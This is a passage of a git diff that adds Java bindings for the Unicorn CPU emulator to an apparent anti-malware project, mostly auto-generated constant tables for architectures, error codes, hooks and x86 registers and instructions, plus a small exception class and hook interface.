static final int UC_VERSION_MINOR = 0; + public static final int UC_VERSION_EXTRA = 2; + public static final int UC_SECOND_SCALE = 1000000; + public static final int UC_MILISECOND_SCALE = 1000; + public static final int UC_ARCH_ARM = 1; + public static final int UC_ARCH_ARM64 = 2; + public static final int UC_ARCH_MIPS = 3; + public static final int UC_ARCH_X86 = 4; + public static final int UC_ARCH_PPC = 5; + public static final int UC_ARCH_SPARC = 6; + public static final int UC_ARCH_M68K = 7; + public static final int UC_ARCH_MAX = 8; + + public static final int UC_MODE_LITTLE_ENDIAN = 0; + public static final int UC_MODE_BIG_ENDIAN = 1073741824; + + public static final int UC_MODE_ARM = 0; + public static final int UC_MODE_THUMB = 16; + public static final int UC_MODE_MCLASS = 32; + public static final int UC_MODE_V8 = 64; + public static final int UC_MODE_ARM926 = 128; + public static final int UC_MODE_ARM946 = 256; + public static final int UC_MODE_ARM1176 = 512; + public static final int UC_MODE_MICRO = 16; + public static final int UC_MODE_MIPS3 = 32; + public static final int UC_MODE_MIPS32R6 = 64; + public static final int UC_MODE_MIPS32 = 4; + public static final int UC_MODE_MIPS64 = 8; + public static final int UC_MODE_16 = 2; + public static final int UC_MODE_32 = 4; + public static final int UC_MODE_64 = 8; + public static final int UC_MODE_PPC32 = 4; + public static final int UC_MODE_PPC64 = 8; + public static final int UC_MODE_QPX = 16; + public static final int UC_MODE_SPARC32 = 4; + public static final int UC_MODE_SPARC64 = 8; + public static final int UC_MODE_V9 = 16; + + public static final int UC_ERR_OK = 0; + public static final int UC_ERR_NOMEM = 1; + public static final int UC_ERR_ARCH = 2; + public static final int UC_ERR_HANDLE = 3; + public static final int UC_ERR_MODE = 4; + public static final int UC_ERR_VERSION = 5; + public static final int UC_ERR_READ_UNMAPPED = 6; + public static final int UC_ERR_WRITE_UNMAPPED = 7; + public static final int UC_ERR_FETCH_UNMAPPED = 8; + public static final int UC_ERR_HOOK = 9; + public static final int UC_ERR_INSN_INVALID = 10; + public static final int UC_ERR_MAP = 11; + public static final int UC_ERR_WRITE_PROT = 12; + public static final int UC_ERR_READ_PROT = 13; + public static final int UC_ERR_FETCH_PROT = 14; + public static final int UC_ERR_ARG = 15; + public static final int UC_ERR_READ_UNALIGNED = 16; + public static final int UC_ERR_WRITE_UNALIGNED = 17; + public static final int UC_ERR_FETCH_UNALIGNED = 18; + public static final int UC_ERR_HOOK_EXIST = 19; + public static final int UC_ERR_RESOURCE = 20; + public static final int UC_ERR_EXCEPTION = 21; + public static final int UC_MEM_READ = 16; + public static final int UC_MEM_WRITE = 17; + public static final int UC_MEM_FETCH = 18; + public static final int UC_MEM_READ_UNMAPPED = 19; + public static final int UC_MEM_WRITE_UNMAPPED = 20; + public static final int UC_MEM_FETCH_UNMAPPED = 21; + public static final int UC_MEM_WRITE_PROT = 22; + public static final int UC_MEM_READ_PROT = 23; + public static final int UC_MEM_FETCH_PROT = 24; + public static final int UC_MEM_READ_AFTER = 25; + public static final int UC_HOOK_INTR = 1; + public static final int UC_HOOK_INSN = 2; + public static final int UC_HOOK_CODE = 4; + public static final int UC_HOOK_BLOCK = 8; + public static final int UC_HOOK_MEM_READ_UNMAPPED = 16; + public static final int UC_HOOK_MEM_WRITE_UNMAPPED = 32; + public static final int UC_HOOK_MEM_FETCH_UNMAPPED = 64; + public static final int UC_HOOK_MEM_READ_PROT = 128; + public static final int UC_HOOK_MEM_WRITE_PROT = 256; + public static final int UC_HOOK_MEM_FETCH_PROT = 512; + public static final int UC_HOOK_MEM_READ = 1024; + public static final int UC_HOOK_MEM_WRITE = 2048; + public static final int UC_HOOK_MEM_FETCH = 4096; + public static final int UC_HOOK_MEM_READ_AFTER = 8192; + public static final int UC_HOOK_INSN_INVALID = 16384; + public static final int UC_HOOK_MEM_UNMAPPED = 112; + public static final int UC_HOOK_MEM_PROT = 896; + public static final int UC_HOOK_MEM_READ_INVALID = 144; + public static final int UC_HOOK_MEM_WRITE_INVALID = 288; + public static final int UC_HOOK_MEM_FETCH_INVALID = 576; + public static final int UC_HOOK_MEM_INVALID = 1008; + public static final int UC_HOOK_MEM_VALID = 7168; + public static final int UC_QUERY_MODE = 1; + public static final int UC_QUERY_PAGE_SIZE = 2; + public static final int UC_QUERY_ARCH = 3; + public static final int UC_QUERY_TIMEOUT = 4; + + public static final int UC_PROT_NONE = 0; + public static final int UC_PROT_READ = 1; + public static final int UC_PROT_WRITE = 2; + public static final int UC_PROT_EXEC = 4; + public static final int UC_PROT_ALL = 7; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/UnicornException.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/UnicornException.java new file mode 100644 index 0000000..175775c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/UnicornException.java @@ -0,0 +1,34 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public class UnicornException extends RuntimeException { + + public UnicornException() { + super(); + } + + public UnicornException(String msg) { + super(msg); + } + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/WriteHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/WriteHook.java new file mode 100644 index 0000000..ee0f79c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/WriteHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface WriteHook extends Hook { + + public void hook(Unicorn u, long address, int size, long value, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/X86Const.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/X86Const.java new file mode 100644 index 0000000..d7a358b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/X86Const.java @@ -0,0 +1,1605 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface X86Const { + +// X86 registers + + public static final int UC_X86_REG_INVALID = 0; + public static final int UC_X86_REG_AH = 1; + public static final int UC_X86_REG_AL = 2; + public static final int UC_X86_REG_AX = 3; + public static final int UC_X86_REG_BH = 4; + public static final int UC_X86_REG_BL = 5; + public static final int UC_X86_REG_BP = 6; + public static final int UC_X86_REG_BPL = 7; + public static final int UC_X86_REG_BX = 8; + public static final int UC_X86_REG_CH = 9; + public static final int UC_X86_REG_CL = 10; + public static final int UC_X86_REG_CS = 11; + public static final int UC_X86_REG_CX = 12; + public static final int UC_X86_REG_DH = 13; + public static final int UC_X86_REG_DI = 14; + public static final int UC_X86_REG_DIL = 15; + public static final int UC_X86_REG_DL = 16; + public static final int UC_X86_REG_DS = 17; + public static final int UC_X86_REG_DX = 18; + public static final int UC_X86_REG_EAX = 19; + public static final int UC_X86_REG_EBP = 20; + public static final int UC_X86_REG_EBX = 21; + public static final int UC_X86_REG_ECX = 22; + public static final int UC_X86_REG_EDI = 23; + public static final int UC_X86_REG_EDX = 24; + public static final int UC_X86_REG_EFLAGS = 25; + public static final int UC_X86_REG_EIP = 26; + public static final int UC_X86_REG_EIZ = 27; + public static final int UC_X86_REG_ES = 28; + public static final int UC_X86_REG_ESI = 29; + public static final int UC_X86_REG_ESP = 30; + public static final int UC_X86_REG_FPSW = 31; + public static final int UC_X86_REG_FS = 32; + public static final int UC_X86_REG_GS = 33; + public static final int UC_X86_REG_IP = 34; + public static final int UC_X86_REG_RAX = 35; + public static final int UC_X86_REG_RBP = 36; + public static final int UC_X86_REG_RBX = 37; + public static final int UC_X86_REG_RCX = 38; + public static final int UC_X86_REG_RDI = 39; + public static final int UC_X86_REG_RDX = 40; + public static final int UC_X86_REG_RIP = 41; + public static final int UC_X86_REG_RIZ = 42; + public static final int UC_X86_REG_RSI = 43; + public static final int UC_X86_REG_RSP = 44; + public static final int UC_X86_REG_SI = 45; + public static final int UC_X86_REG_SIL = 46; + public static final int UC_X86_REG_SP = 47; + public static final int UC_X86_REG_SPL = 48; + public static final int UC_X86_REG_SS = 49; + public static final int UC_X86_REG_CR0 = 50; + public static final int UC_X86_REG_CR1 = 51; + public static final int UC_X86_REG_CR2 = 52; + public static final int UC_X86_REG_CR3 = 53; + public static final int UC_X86_REG_CR4 = 54; + public static final int UC_X86_REG_CR5 = 55; + public static final int UC_X86_REG_CR6 = 56; + public static final int UC_X86_REG_CR7 = 57; + public static final int UC_X86_REG_CR8 = 58; + public static final int UC_X86_REG_CR9 = 59; + public static final int UC_X86_REG_CR10 = 60; + public static final int UC_X86_REG_CR11 = 61; + public static final int UC_X86_REG_CR12 = 62; + public static final int UC_X86_REG_CR13 = 63; + public static final int UC_X86_REG_CR14 = 64; + public static final int UC_X86_REG_CR15 = 65; + public static final int UC_X86_REG_DR0 = 66; + public static final int UC_X86_REG_DR1 = 67; + public static final int UC_X86_REG_DR2 = 68; + public static final int UC_X86_REG_DR3 = 69; + public static final int UC_X86_REG_DR4 = 70; + public static final int UC_X86_REG_DR5 = 71; + public static final int UC_X86_REG_DR6 = 72; + public static final int UC_X86_REG_DR7 = 73; + public static final int UC_X86_REG_DR8 = 74; + public static final int UC_X86_REG_DR9 = 75; + public static final int UC_X86_REG_DR10 = 76; + public static final int UC_X86_REG_DR11 = 77; + public static final int UC_X86_REG_DR12 = 78; + public static final int UC_X86_REG_DR13 = 79; + public static final int UC_X86_REG_DR14 = 80; + public static final int UC_X86_REG_DR15 = 81; + public static final int UC_X86_REG_FP0 = 82; + public static final int UC_X86_REG_FP1 = 83; + public static final int UC_X86_REG_FP2 = 84; + public static final int UC_X86_REG_FP3 = 85; + public static final int UC_X86_REG_FP4 = 86; + public static final int UC_X86_REG_FP5 = 87; + public static final int UC_X86_REG_FP6 = 88; + public static final int UC_X86_REG_FP7 = 89; + public static final int UC_X86_REG_K0 = 90; + public static final int UC_X86_REG_K1 = 91; + public static final int UC_X86_REG_K2 = 92; + public static final int UC_X86_REG_K3 = 93; + public static final int UC_X86_REG_K4 = 94; + public static final int UC_X86_REG_K5 = 95; + public static final int UC_X86_REG_K6 = 96; + public static final int UC_X86_REG_K7 = 97; + public static final int UC_X86_REG_MM0 = 98; + public static final int UC_X86_REG_MM1 = 99; + public static final int UC_X86_REG_MM2 = 100; + public static final int UC_X86_REG_MM3 = 101; + public static final int UC_X86_REG_MM4 = 102; + public static final int UC_X86_REG_MM5 = 103; + public static final int UC_X86_REG_MM6 = 104; + public static final int UC_X86_REG_MM7 = 105; + public static final int UC_X86_REG_R8 = 106; + public static final int UC_X86_REG_R9 = 107; + public static final int UC_X86_REG_R10 = 108; + public static final int UC_X86_REG_R11 = 109; + public static final int UC_X86_REG_R12 = 110; + public static final int UC_X86_REG_R13 = 111; + public static final int UC_X86_REG_R14 = 112; + public static final int UC_X86_REG_R15 = 113; + public static final int UC_X86_REG_ST0 = 114; + public static final int UC_X86_REG_ST1 = 115; + public static final int UC_X86_REG_ST2 = 116; + public static final int UC_X86_REG_ST3 = 117; + public static final int UC_X86_REG_ST4 = 118; + public static final int UC_X86_REG_ST5 = 119; + public static final int UC_X86_REG_ST6 = 120; + public static final int UC_X86_REG_ST7 = 121; + public static final int UC_X86_REG_XMM0 = 122; + public static final int UC_X86_REG_XMM1 = 123; + public static final int UC_X86_REG_XMM2 = 124; + public static final int UC_X86_REG_XMM3 = 125; + public static final int UC_X86_REG_XMM4 = 126; + public static final int UC_X86_REG_XMM5 = 127; + public static final int UC_X86_REG_XMM6 = 128; + public static final int UC_X86_REG_XMM7 = 129; + public static final int UC_X86_REG_XMM8 = 130; + public static final int UC_X86_REG_XMM9 = 131; + public static final int UC_X86_REG_XMM10 = 132; + public static final int UC_X86_REG_XMM11 = 133; + public static final int UC_X86_REG_XMM12 = 134; + public static final int UC_X86_REG_XMM13 = 135; + public static final int UC_X86_REG_XMM14 = 136; + public static final int UC_X86_REG_XMM15 = 137; + public static final int UC_X86_REG_XMM16 = 138; + public static final int UC_X86_REG_XMM17 = 139; + public static final int UC_X86_REG_XMM18 = 140; + public static final int UC_X86_REG_XMM19 = 141; + public static final int UC_X86_REG_XMM20 = 142; + public static final int UC_X86_REG_XMM21 = 143; + public static final int UC_X86_REG_XMM22 = 144; + public static final int UC_X86_REG_XMM23 = 145; + public static final int UC_X86_REG_XMM24 = 146; + public static final int UC_X86_REG_XMM25 = 147; + public static final int UC_X86_REG_XMM26 = 148; + public static final int UC_X86_REG_XMM27 = 149; + public static final int UC_X86_REG_XMM28 = 150; + public static final int UC_X86_REG_XMM29 = 151; + public static final int UC_X86_REG_XMM30 = 152; + public static final int UC_X86_REG_XMM31 = 153; + public static final int UC_X86_REG_YMM0 = 154; + public static final int UC_X86_REG_YMM1 = 155; + public static final int UC_X86_REG_YMM2 = 156; + public static final int UC_X86_REG_YMM3 = 157; + public static final int UC_X86_REG_YMM4 = 158; + public static final int UC_X86_REG_YMM5 = 159; + public static final int UC_X86_REG_YMM6 = 160; + public static final int UC_X86_REG_YMM7 = 161; + public static final int UC_X86_REG_YMM8 = 162; + public static final int UC_X86_REG_YMM9 = 163; + public static final int UC_X86_REG_YMM10 = 164; + public static final int UC_X86_REG_YMM11 = 165; + public static final int UC_X86_REG_YMM12 = 166; + public static final int UC_X86_REG_YMM13 = 167; + public static final int UC_X86_REG_YMM14 = 168; + public static final int UC_X86_REG_YMM15 = 169; + public static final int UC_X86_REG_YMM16 = 170; + public static final int UC_X86_REG_YMM17 = 171; + public static final int UC_X86_REG_YMM18 = 172; + public static final int UC_X86_REG_YMM19 = 173; + public static final int UC_X86_REG_YMM20 = 174; + public static final int UC_X86_REG_YMM21 = 175; + public static final int UC_X86_REG_YMM22 = 176; + public static final int UC_X86_REG_YMM23 = 177; + public static final int UC_X86_REG_YMM24 = 178; + public static final int UC_X86_REG_YMM25 = 179; + public static final int UC_X86_REG_YMM26 = 180; + public static final int UC_X86_REG_YMM27 = 181; + public static final int UC_X86_REG_YMM28 = 182; + public static final int UC_X86_REG_YMM29 = 183; + public static final int UC_X86_REG_YMM30 = 184; + public static final int UC_X86_REG_YMM31 = 185; + public static final int UC_X86_REG_ZMM0 = 186; + public static final int UC_X86_REG_ZMM1 = 187; + public static final int UC_X86_REG_ZMM2 = 188; + public static final int UC_X86_REG_ZMM3 = 189; + public static final int UC_X86_REG_ZMM4 = 190; + public static final int UC_X86_REG_ZMM5 = 191; + public static final int UC_X86_REG_ZMM6 = 192; + public static final int UC_X86_REG_ZMM7 = 193; + public static final int UC_X86_REG_ZMM8 = 194; + public static final int UC_X86_REG_ZMM9 = 195; + public static final int UC_X86_REG_ZMM10 = 196; + public static final int UC_X86_REG_ZMM11 = 197; + public static final int UC_X86_REG_ZMM12 = 198; + public static final int UC_X86_REG_ZMM13 = 199; + public static final int UC_X86_REG_ZMM14 = 200; + public static final int UC_X86_REG_ZMM15 = 201; + public static final int UC_X86_REG_ZMM16 = 202; + public static final int UC_X86_REG_ZMM17 = 203; + public static final int UC_X86_REG_ZMM18 = 204; + public static final int UC_X86_REG_ZMM19 = 205; + public static final int UC_X86_REG_ZMM20 = 206; + public static final int UC_X86_REG_ZMM21 = 207; + public static final int UC_X86_REG_ZMM22 = 208; + public static final int UC_X86_REG_ZMM23 = 209; + public static final int UC_X86_REG_ZMM24 = 210; + public static final int UC_X86_REG_ZMM25 = 211; + public static final int UC_X86_REG_ZMM26 = 212; + public static final int UC_X86_REG_ZMM27 = 213; + public static final int UC_X86_REG_ZMM28 = 214; + public static final int UC_X86_REG_ZMM29 = 215; + public static final int UC_X86_REG_ZMM30 = 216; + public static final int UC_X86_REG_ZMM31 = 217; + public static final int UC_X86_REG_R8B = 218; + public static final int UC_X86_REG_R9B = 219; + public static final int UC_X86_REG_R10B = 220; + public static final int UC_X86_REG_R11B = 221; + public static final int UC_X86_REG_R12B = 222; + public static final int UC_X86_REG_R13B = 223; + public static final int UC_X86_REG_R14B = 224; + public static final int UC_X86_REG_R15B = 225; + public static final int UC_X86_REG_R8D = 226; + public static final int UC_X86_REG_R9D = 227; + public static final int UC_X86_REG_R10D = 228; + public static final int UC_X86_REG_R11D = 229; + public static final int UC_X86_REG_R12D = 230; + public static final int UC_X86_REG_R13D = 231; + public static final int UC_X86_REG_R14D = 232; + public static final int UC_X86_REG_R15D = 233; + public static final int UC_X86_REG_R8W = 234; + public static final int UC_X86_REG_R9W = 235; + public static final int UC_X86_REG_R10W = 236; + public static final int UC_X86_REG_R11W = 237; + public static final int UC_X86_REG_R12W = 238; + public static final int UC_X86_REG_R13W = 239; + public static final int UC_X86_REG_R14W = 240; + public static final int UC_X86_REG_R15W = 241; + public static final int UC_X86_REG_IDTR = 242; + public static final int UC_X86_REG_GDTR = 243; + public static final int UC_X86_REG_LDTR = 244; + public static final int UC_X86_REG_TR = 245; + public static final int UC_X86_REG_FPCW = 246; + public static final int UC_X86_REG_FPTAG = 247; + public static final int UC_X86_REG_MSR = 248; + public static final int UC_X86_REG_MXCSR = 249; + public static final int UC_X86_REG_FS_BASE = 250; + public static final int UC_X86_REG_GS_BASE = 251; + public static final int UC_X86_REG_ENDING = 252; + +// X86 instructions + + public static final int UC_X86_INS_INVALID = 0; + public static final int UC_X86_INS_AAA = 1; + public static final int UC_X86_INS_AAD = 2; + public static final int UC_X86_INS_AAM = 3; + public static final int UC_X86_INS_AAS = 4; + public static final int UC_X86_INS_FABS = 5; + public static final int UC_X86_INS_ADC = 6; + public static final int UC_X86_INS_ADCX = 7; + public static final int UC_X86_INS_ADD = 8; + public static final int UC_X86_INS_ADDPD = 9; + public static final int UC_X86_INS_ADDPS = 10; + public static final int UC_X86_INS_ADDSD = 11; + public static final int UC_X86_INS_ADDSS = 12; + public static final int UC_X86_INS_ADDSUBPD = 13; + public static final int UC_X86_INS_ADDSUBPS = 14; + public static final int UC_X86_INS_FADD = 15; + public static final int UC_X86_INS_FIADD = 16; + public static final int UC_X86_INS_FADDP = 17; + public static final int UC_X86_INS_ADOX = 18; + public static final int UC_X86_INS_AESDECLAST = 19; + public static final int UC_X86_INS_AESDEC = 20; + public static final int UC_X86_INS_AESENCLAST = 21; + public static final int UC_X86_INS_AESENC = 22; + public static final int UC_X86_INS_AESIMC = 23; + public static final int UC_X86_INS_AESKEYGENASSIST = 24; + public static final int UC_X86_INS_AND = 25; + public static final int UC_X86_INS_ANDN = 26; + public static final int UC_X86_INS_ANDNPD = 27; + public static final int UC_X86_INS_ANDNPS = 28; + public static final int UC_X86_INS_ANDPD = 29; + public static final int UC_X86_INS_ANDPS = 30; + public static final int UC_X86_INS_ARPL = 31; + public static final int UC_X86_INS_BEXTR = 32; + public static final int UC_X86_INS_BLCFILL = 33; + public static final int UC_X86_INS_BLCI = 34; + public static final int UC_X86_INS_BLCIC = 35; + public static final int UC_X86_INS_BLCMSK = 36; + public static final int UC_X86_INS_BLCS = 37; + public static final int UC_X86_INS_BLENDPD = 38; + public static final int UC_X86_INS_BLENDPS = 39; + public static final int UC_X86_INS_BLENDVPD = 40; + public static final int UC_X86_INS_BLENDVPS = 41; + public static final int UC_X86_INS_BLSFILL = 42; + public static final int UC_X86_INS_BLSI = 43; + public static final int UC_X86_INS_BLSIC = 44; + public static final int UC_X86_INS_BLSMSK = 45; + public static final int UC_X86_INS_BLSR = 46; + public static final int UC_X86_INS_BOUND = 47; + public static final int UC_X86_INS_BSF = 48; + public static final int UC_X86_INS_BSR = 49; + public static final int UC_X86_INS_BSWAP = 50; + public static final int UC_X86_INS_BT = 51; + public static final int UC_X86_INS_BTC = 52; + public static final int UC_X86_INS_BTR = 53; + public static final int UC_X86_INS_BTS = 54; + public static final int UC_X86_INS_BZHI = 55; + public static final int UC_X86_INS_CALL = 56; + public static final int UC_X86_INS_CBW = 57; + public static final int UC_X86_INS_CDQ = 58; + public static final int UC_X86_INS_CDQE = 59; + public static final int UC_X86_INS_FCHS = 60; + public static final int UC_X86_INS_CLAC = 61; + public static final int UC_X86_INS_CLC = 62; + public static final int UC_X86_INS_CLD = 63; + public static final int UC_X86_INS_CLFLUSH = 64; + public static final int UC_X86_INS_CLFLUSHOPT = 65; + public static final int UC_X86_INS_CLGI = 66; + public static final int UC_X86_INS_CLI = 67; + public static final int UC_X86_INS_CLTS = 68; + public static final int UC_X86_INS_CLWB = 69; + public static final int UC_X86_INS_CMC = 70; + public static final int UC_X86_INS_CMOVA = 71; + public static final int UC_X86_INS_CMOVAE = 72; + public static final int UC_X86_INS_CMOVB = 73; + public static final int UC_X86_INS_CMOVBE = 74; + public static final int UC_X86_INS_FCMOVBE = 75; + public static final int UC_X86_INS_FCMOVB = 76; + public static final int UC_X86_INS_CMOVE = 77; + public static final int UC_X86_INS_FCMOVE = 78; + public static final int UC_X86_INS_CMOVG = 79; + public static final int UC_X86_INS_CMOVGE = 80; + public static final int UC_X86_INS_CMOVL = 81; + public static final int UC_X86_INS_CMOVLE = 82; + public static final int UC_X86_INS_FCMOVNBE = 83; + public static final int UC_X86_INS_FCMOVNB = 84; + public static final int UC_X86_INS_CMOVNE = 85; + public static final int UC_X86_INS_FCMOVNE = 86; + public static final int UC_X86_INS_CMOVNO = 87; + public static final int UC_X86_INS_CMOVNP = 88; + public static final int UC_X86_INS_FCMOVNU = 89; + public static final int UC_X86_INS_CMOVNS = 90; + public static final int UC_X86_INS_CMOVO = 91; + public static final int UC_X86_INS_CMOVP = 92; + public static final int UC_X86_INS_FCMOVU = 93; + public static final int UC_X86_INS_CMOVS = 94; + public static final int UC_X86_INS_CMP = 95; + public static final int UC_X86_INS_CMPPD = 96; + public static final int UC_X86_INS_CMPPS = 97; + public static final int UC_X86_INS_CMPSB = 98; + public static final int UC_X86_INS_CMPSD = 99; + public static final int UC_X86_INS_CMPSQ = 100; + public static final int UC_X86_INS_CMPSS = 101; + public static final int UC_X86_INS_CMPSW = 102; + public static final int UC_X86_INS_CMPXCHG16B = 103; + public static final int UC_X86_INS_CMPXCHG = 104; + public static final int UC_X86_INS_CMPXCHG8B = 105; + public static final int UC_X86_INS_COMISD = 106; + public static final int UC_X86_INS_COMISS = 107; + public static final int UC_X86_INS_FCOMP = 108; + public static final int UC_X86_INS_FCOMPI = 109; + public static final int UC_X86_INS_FCOMI = 110; + public static final int UC_X86_INS_FCOM = 111; + public static final int UC_X86_INS_FCOS = 112; + public static final int UC_X86_INS_CPUID = 113; + public static final int UC_X86_INS_CQO = 114; + public static final int UC_X86_INS_CRC32 = 115; + public static final int UC_X86_INS_CVTDQ2PD = 116; + public static final int UC_X86_INS_CVTDQ2PS = 117; + public static final int UC_X86_INS_CVTPD2DQ = 118; + public static final int UC_X86_INS_CVTPD2PS = 119; + public static final int UC_X86_INS_CVTPS2DQ = 120; + public static final int UC_X86_INS_CVTPS2PD = 121; + public static final int UC_X86_INS_CVTSD2SI = 122; + public static final int UC_X86_INS_CVTSD2SS = 123; + public static final int UC_X86_INS_CVTSI2SD = 124; + public static final int UC_X86_INS_CVTSI2SS = 125; + public static final int UC_X86_INS_CVTSS2SD = 126; + public static final int UC_X86_INS_CVTSS2SI = 127; + public static final int UC_X86_INS_CVTTPD2DQ = 128; + public static final int UC_X86_INS_CVTTPS2DQ = 129; + public static final int UC_X86_INS_CVTTSD2SI = 130; + public static final int UC_X86_INS_CVTTSS2SI = 131; + public static final int UC_X86_INS_CWD = 132; + public static final int UC_X86_INS_CWDE = 133; + public static final int UC_X86_INS_DAA = 134; + public static final int UC_X86_INS_DAS = 135; + public static final int UC_X86_INS_DATA16 = 136; + public static final int UC_X86_INS_DEC = 137; + public static final int UC_X86_INS_DIV = 138; + public static final int UC_X86_INS_DIVPD = 139; + public static final int UC_X86_INS_DIVPS = 140; + public static final int UC_X86_INS_FDIVR = 141; + public static final int UC_X86_INS_FIDIVR = 142; + public static final int UC_X86_INS_FDIVRP = 143; + public static final int UC_X86_INS_DIVSD = 144; + public static final int UC_X86_INS_DIVSS = 145; + public static final int UC_X86_INS_FDIV = 146; + public static final int UC_X86_INS_FIDIV = 147; + public static final int UC_X86_INS_FDIVP = 148; + public static final int UC_X86_INS_DPPD = 149; + public static final int UC_X86_INS_DPPS = 150; + public static final int UC_X86_INS_RET = 151; + public static final int UC_X86_INS_ENCLS = 152; + public static final int UC_X86_INS_ENCLU = 153; + public static final int UC_X86_INS_ENTER = 154; + public static final int UC_X86_INS_EXTRACTPS = 155; + public static final int UC_X86_INS_EXTRQ = 156; + public static final int UC_X86_INS_F2XM1 = 157; + public static final int UC_X86_INS_LCALL = 158; + public static final int UC_X86_INS_LJMP = 159; + public static final int UC_X86_INS_FBLD = 160; + public static final int UC_X86_INS_FBSTP = 161; + public static final int UC_X86_INS_FCOMPP = 162; + public static final int UC_X86_INS_FDECSTP = 163; + public static final int UC_X86_INS_FEMMS = 164; + public static final int UC_X86_INS_FFREE = 165; + public static final int UC_X86_INS_FICOM = 166; + public static final int UC_X86_INS_FICOMP = 167; + public static final int UC_X86_INS_FINCSTP = 168; + public static final int UC_X86_INS_FLDCW = 169; + public static final int UC_X86_INS_FLDENV = 170; + public static final int UC_X86_INS_FLDL2E = 171; + public static final int UC_X86_INS_FLDL2T = 172; + public static final int UC_X86_INS_FLDLG2 = 173; + public static final int UC_X86_INS_FLDLN2 = 174; + public static final int UC_X86_INS_FLDPI = 175; + public static final int UC_X86_INS_FNCLEX = 176; + public static final int UC_X86_INS_FNINIT = 177; + public static final int UC_X86_INS_FNOP = 178; + public static final int UC_X86_INS_FNSTCW = 179; + public static final int UC_X86_INS_FNSTSW = 180; + public static final int UC_X86_INS_FPATAN = 181; + public static final int UC_X86_INS_FPREM = 182; + public static final int UC_X86_INS_FPREM1 = 183; + public static final int UC_X86_INS_FPTAN = 184; + public static final int UC_X86_INS_FFREEP = 185; + public static final int UC_X86_INS_FRNDINT = 186; + public static final int UC_X86_INS_FRSTOR = 187; + public static final int UC_X86_INS_FNSAVE = 188; + public static final int UC_X86_INS_FSCALE = 189; + public static final int UC_X86_INS_FSETPM = 190; + public static final int UC_X86_INS_FSINCOS = 191; + public static final int UC_X86_INS_FNSTENV = 192; + public static final int UC_X86_INS_FXAM = 193; + public static final int UC_X86_INS_FXRSTOR = 194; + public static final int UC_X86_INS_FXRSTOR64 = 195; + public static final int UC_X86_INS_FXSAVE = 196; + public static final int UC_X86_INS_FXSAVE64 = 197; + public static final int UC_X86_INS_FXTRACT = 198; + public static final int UC_X86_INS_FYL2X = 199; + public static final int UC_X86_INS_FYL2XP1 = 200; + public static final int UC_X86_INS_MOVAPD = 201; + public static final int UC_X86_INS_MOVAPS = 202; + public static final int UC_X86_INS_ORPD = 203; + public static final int UC_X86_INS_ORPS = 204; + public static final int UC_X86_INS_VMOVAPD = 205; + public static final int UC_X86_INS_VMOVAPS = 206; + public static final int UC_X86_INS_XORPD = 207; + public static final int UC_X86_INS_XORPS = 208; + public static final int UC_X86_INS_GETSEC = 209; + public static final int UC_X86_INS_HADDPD = 210; + public static final int UC_X86_INS_HADDPS = 211; + public static final int UC_X86_INS_HLT = 212; + public static final int UC_X86_INS_HSUBPD = 213; + public static final int UC_X86_INS_HSUBPS = 214; + public static final int UC_X86_INS_IDIV = 215; + public static final int UC_X86_INS_FILD = 216; + public static final int UC_X86_INS_IMUL = 217; + public static final int UC_X86_INS_IN = 218; + public static final int UC_X86_INS_INC = 219; + public static final int UC_X86_INS_INSB = 220; + public static final int UC_X86_INS_INSERTPS = 221; + public static final int UC_X86_INS_INSERTQ = 222; + public static final int UC_X86_INS_INSD = 223; + public static final int UC_X86_INS_INSW = 224; + public static final int UC_X86_INS_INT = 225; + public static final int UC_X86_INS_INT1 = 226; + public static final int UC_X86_INS_INT3 = 227; + public static final int UC_X86_INS_INTO = 228; + public static final int UC_X86_INS_INVD = 229; + public static final int UC_X86_INS_INVEPT = 230; + public static final int UC_X86_INS_INVLPG = 231; + public static final int UC_X86_INS_INVLPGA = 232; + public static final int UC_X86_INS_INVPCID = 233; + public static final int UC_X86_INS_INVVPID = 234; + public static final int UC_X86_INS_IRET = 235; + public static final int UC_X86_INS_IRETD = 236; + public static final int UC_X86_INS_IRETQ = 237; + public static final int UC_X86_INS_FISTTP = 238; + public static final int UC_X86_INS_FIST = 239; + public static final int UC_X86_INS_FISTP = 240; + public static final int UC_X86_INS_UCOMISD = 241; + public static final int UC_X86_INS_UCOMISS = 242; + public static final int UC_X86_INS_VCOMISD = 243; + public static final int UC_X86_INS_VCOMISS = 244; + public static final int UC_X86_INS_VCVTSD2SS = 245; + public static final int UC_X86_INS_VCVTSI2SD = 246; + public static final int UC_X86_INS_VCVTSI2SS = 247; + public static final int UC_X86_INS_VCVTSS2SD = 248; + public static final int UC_X86_INS_VCVTTSD2SI = 249; + public static final int UC_X86_INS_VCVTTSD2USI = 250; + public static final int UC_X86_INS_VCVTTSS2SI = 251; + public static final int 